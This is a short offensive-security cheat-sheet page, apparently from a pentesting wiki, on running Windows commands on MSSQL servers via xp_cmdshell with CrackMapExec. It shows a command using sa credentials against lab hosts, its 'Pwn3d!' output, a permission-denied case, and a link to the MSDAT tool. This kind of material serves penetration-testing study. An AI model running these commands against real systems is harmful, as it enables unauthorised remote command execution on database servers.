Windows command
Execute Windows command using CrackMapExec

Execute Windows Command

This option use xp_cmdshell to exec command on the remote host.
1
#~ cme mssql 10.10.10.59 -u sa -p 'GWE3V65#[email protected]' --local-auth -x whoami
2
MSSQL 10.10.10.59 1433 None [+] sa:GWE3V65#[email protected] (Pwn3d!)
3
MSSQL 10.10.10.59 1433 None [+] Executed command via mssqlexec
4
MSSQL 10.10.10.59 1433 None --------------------------------------------------------------------------------
5
MSSQL 10.10.10.59 1433 None tally\sarah
Copied!
If permission is DENIED:
1
MSSQL 10.10.10.52 1433 None [+] admin:[email protected][email protected]! (Pwn3d!)
2
MSSQL 10.10.10.52 1433 None [-] ERROR(MANTIS\SQLEXPRESS): Line 1: The EXECUTE permission was denied on the object 'xp_cmdshell', database 'mssqlsystemresource', schema 'sys'.
3
MSSQL 10.10.10.52 1433 None [+] Executed command via mssqlexec
4
MSSQL 10.10.10.52 1433 None None
Copied!
When playing with MSSQL, you can use the tool MSDAT from quentinhardy​
GitHub - quentinhardy/msdat: MSDAT: Microsoft SQL Database Attacking Tool
GitHub
​
Copy link